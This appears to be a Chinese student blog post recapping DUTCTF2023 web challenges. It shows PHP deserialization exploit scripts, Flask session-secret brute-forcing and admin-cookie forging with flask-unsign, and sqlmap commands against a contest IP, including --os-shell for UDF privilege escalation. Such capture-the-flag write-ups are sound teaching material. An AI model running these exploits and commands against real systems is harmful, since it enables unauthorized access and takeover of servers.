<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="DUTCTF2023复盘Trenja这个就是小游戏，本质上是考察js代码泄露，要么通关，要么直接找就行  最简单的方法就是f12进入调试器，然后ctrl+F搜索flag就行  得到flag babyphp这道题就是反序列化，win函数的调用需要传入name变量，把nickname设置为admin就好 exp： 12345678910111213141516171819202122232425262">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2023/06/28/LuffyS93/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="DUTCTF2023复盘Trenja这个就是小游戏，本质上是考察js代码泄露，要么通关，要么直接找就行  最简单的方法就是f12进入调试器，然后ctrl+F搜索flag就行  得到flag babyphp这道题就是反序列化，win函数的调用需要传入name变量，把nickname设置为admin就好 exp： 12345678910111213141516171819202122232425262">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626080313045.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626080416955.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626082836797.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626202715401.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203235771.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203524219.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203754918.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203830022.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626174258510.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626174412027.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626175511017.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626175705727.png">
<meta property="article:published_time" content="2023-06-28T08:56:41.434Z">
<meta property="article:modified_time" content="2023-06-28T08:57:28.274Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626080313045.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-LuffyS93" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/06/28/LuffyS93/" class="article-date">
  <time class="dt-published" datetime="2023-06-28T08:56:41.434Z" itemprop="datePublished">2023-06-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="DUTCTF2023复盘"><a href="#DUTCTF2023复盘" class="headerlink" title="DUTCTF2023复盘"></a>DUTCTF2023复盘</h1><h2 id="Trenja"><a href="#Trenja" class="headerlink" title="Trenja"></a>Trenja</h2><p>这个就是小游戏，本质上是考察js代码泄露，要么通关，要么直接找就行</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626080313045.png" alt="image-20230626080313045"></p>
<p>最简单的方法就是f12进入调试器，然后ctrl+F搜索flag就行</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626080416955.png" alt="image-20230626080416955"></p>
<p>得到flag</p>
<h2 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h2><p>这道题就是反序列化，win函数的调用需要传入name变量，把nickname设置为admin就好</p>
<p>exp：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span> = <span class="string">&#x27;guest&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$passwd</span> = <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$info</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;name === <span class="string">&#x27;admin&#x27;</span> &amp;&amp; <span class="title function_ invoke__">md5</span>(<span class="variable">$this</span>-&gt;passwd) === <span class="string">&#x27;21232f297a57a5a743894a0e4a801fc3&#x27;</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;Logged in as admin, but it is meaningless.&#x27;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;you are not admin&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;info-&gt;<span class="title function_ invoke__">update</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Info</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$age</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$nickname</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$birthday</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">win</span>(<span class="variable">$this</span>-&gt;nickname);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">User</span>();</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> <span class="title class_">Info</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;info = <span class="variable">$b</span>;</span><br><span class="line"><span class="variable">$b</span>-&gt;nickname=<span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>看了看学姐的wp，把得到的序列化字符传进去，发现把__toString()也给调用了</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626082836797.png" alt="image-20230626082836797"></p>
<p>__toString() 方法用于一个类被当成字符串时应怎样回应</p>
<p>学姐的exp如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$passwd</span> = <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$info</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Info</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$nickname</span> = <span class="string">&#x27;admin&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">NewInfo</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$id</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$user</span> = <span class="keyword">new</span> <span class="title class_">User</span>();</span><br><span class="line"><span class="variable">$info</span> = <span class="keyword">new</span> <span class="title class_">Info</span>();</span><br><span class="line"><span class="variable">$ninfo</span> = <span class="keyword">new</span> <span class="title class_">NewInfo</span>();</span><br><span class="line"></span><br><span class="line"><span class="variable">$user</span>-&gt;info = <span class="variable">$ninfo</span>;</span><br><span class="line"><span class="variable">$user</span>-&gt;info-&gt;id = <span class="variable">$user</span>;</span><br><span class="line"><span class="variable">$user</span>-&gt;info-&gt;id-&gt;passwd = <span class="variable">$info</span>;<span class="comment">//$info是info类，里面有名字为nickname的字符串，值为“admin”，因此在进行序列化的时候会调用__toString()，输出（*＾-＾*），其中newinfo起到一个过渡作用</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$user</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;\n&quot;</span>;</span><br></pre></td></tr></table></figure>

<h2 id="fake-session"><a href="#fake-session" class="headerlink" title="fake_session"></a>fake_session</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, session</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> my_secret</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">&#x27;SECRET_KEY&#x27;</span>] = my_secret.my_secret()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello_world</span>():</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> session.get(<span class="string">&#x27;user&#x27;</span>):</span><br><span class="line">        session[<span class="string">&#x27;user&#x27;</span>] = <span class="string">&#x27;&#x27;</span>.join(random.choices(<span class="string">&quot;23333&quot;</span>, k=<span class="number">5</span>))</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello &#123;&#125;!&#x27;</span>.<span class="built_in">format</span>(session[<span class="string">&#x27;user&#x27;</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/admin&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">admin</span>():</span><br><span class="line">    <span class="keyword">if</span> session.get(<span class="string">&#x27;user&#x27;</span>) != <span class="string">&quot;admin&quot;</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;you are not admin!go away&quot;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;/flag&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            <span class="keyword">for</span> line <span class="keyword">in</span> f:</span><br><span class="line">                flag += line</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Congratulations! You logged in as admin. Here is the flag:&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(flag)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>题目围绕着session的值来出题，对这个网页抓个包</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626202715401.png" alt="image-20230626202715401"></p>
<p>由于题目给了个hint，弱口令，那么密码应该是2-4位或者2-5位（其实也是先看wp后才推测的）</p>
<p>用学姐的脚本得到了一个弱口令文档</p>
<p>然后我们可以用flask-unsign对session进行爆破，得到secret.key</p>
<p>flask-unsign是一个解密工具，它有自己的字典</p>
<p>先用这个命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign --unsign --cookie &#x27;eyJ1c2VyIjoiMzMzMzMifQ.ZJl7BQ.F6USeF92uA9ZqwywaKOZh7lRzLM&#x27; -w pass.txt</span><br></pre></td></tr></table></figure>

<p>先看看我们自己做的弱口令有没有secret.key，如果有的话它会跟我们报错</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203235771.png" alt="image-20230626203235771"></p>
<p>如果红色标记的数字小于字典里面弱口令的数目，说明这里面一定有secret.key</p>
<p>接下来就是要把secret.key给爆出来</p>
<p>查了查网上的一些资料，secret.key可以通过这样爆出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign --unsign --cookie &#x27;eyJ1c2VyIjoiMzMzMzMifQ.ZJl7BQ.F6USeF92uA9ZqwywaKOZh7lRzLM&#x27; -w pass.txt --no-literal-eval</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203524219.png" alt="image-20230626203524219"></p>
<p>得到secret.key</p>
<p>然后就是用flask-session-cookie-manager加密了</p>
<p>在上上一个图中，session解密出的格式是{‘user’: ‘33333’}，那么就改成{‘user’: ‘admin’}</p>
<p>加密指令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python flask_session_cookie_manager3.py encode -s &#x27;88c&#x27; -t &#x27;&#123;&quot;user&quot;:&quot;admin&quot;&#125;&#x27;</span><br></pre></td></tr></table></figure>

<p>得到：eyJ1c2VyIjoiYWRtaW4ifQ.ZJmCuw.Mvubb1hIMqHbmeMqTiofCCjQD3c</p>
<p>将这个session值传进去</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203754918.png" alt="image-20230626203754918"></p>
<p>好的，成功了</p>
<p>然后我们进入admin下进行抓包传session</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626203830022.png" alt="image-20230626203830022"></p>
<p>得到flag</p>
<h2 id="ez-udf"><a href="#ez-udf" class="headerlink" title="ez_udf"></a>ez_udf</h2><p>登录界面的话一般第一个想的是sql注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://121.36.72.106:28054/login.php?email=a&amp;password=b&quot; --dbs</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626174258510.png" alt="image-20230626174258510"></p>
<p>把ez_udf爆出来</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626174412027.png" alt="image-20230626174412027"></p>
<p>其实开始并不是这样想的，因为sqlmap用了之后一般想着爆表找flag，然而比赛的时候试了几次之后总是flag为空（好像是没有权限）</p>
<p>进入网站后，啥都点不了，member倒是可以</p>
<p>进入鱼神的网站后，也没有什么可用的</p>
<p>再去用sqlmap试试，爆不出来了</p>
<p>回去看看，之前在网上搜udf提权，试试能不能直接getshell（显然不行）</p>
<p>这也不行那也不行，是不是忽略了什么</p>
<p>返回头来看了看，发现member跳转后的网址与把鼠标放在member上面显示的网站不同，并且?id&#x3D;1可能有sql注入点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;121.36.72.106:28054/member.php?id=1&quot; --os-shell</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626175511017.png" alt="image-20230626175511017"></p>
<p>成功提权</p>
<p>P.s. 这里我选的64-bits，虽然并不知道32-bits为什么写不出来</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230626175705727.png" alt="image-20230626175705727"></p>
<p>一系列操作得到flag（等等，wp上面到这一步的时候提权了但没完全成功，因为原题是flag读写权限完全属于mysql用户，还需要进一步提权）而本题getshell后的角色就是mysql，直接读到flag了</p>
<p>手写版本待定中</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/06/28/LuffyS93/" data-id="cljfhg66a0000zcka6u914wq2" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2023/06/28/blog-name/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">June 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/06/28/LuffyS93/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/06/28/blog-name/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/06/28/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>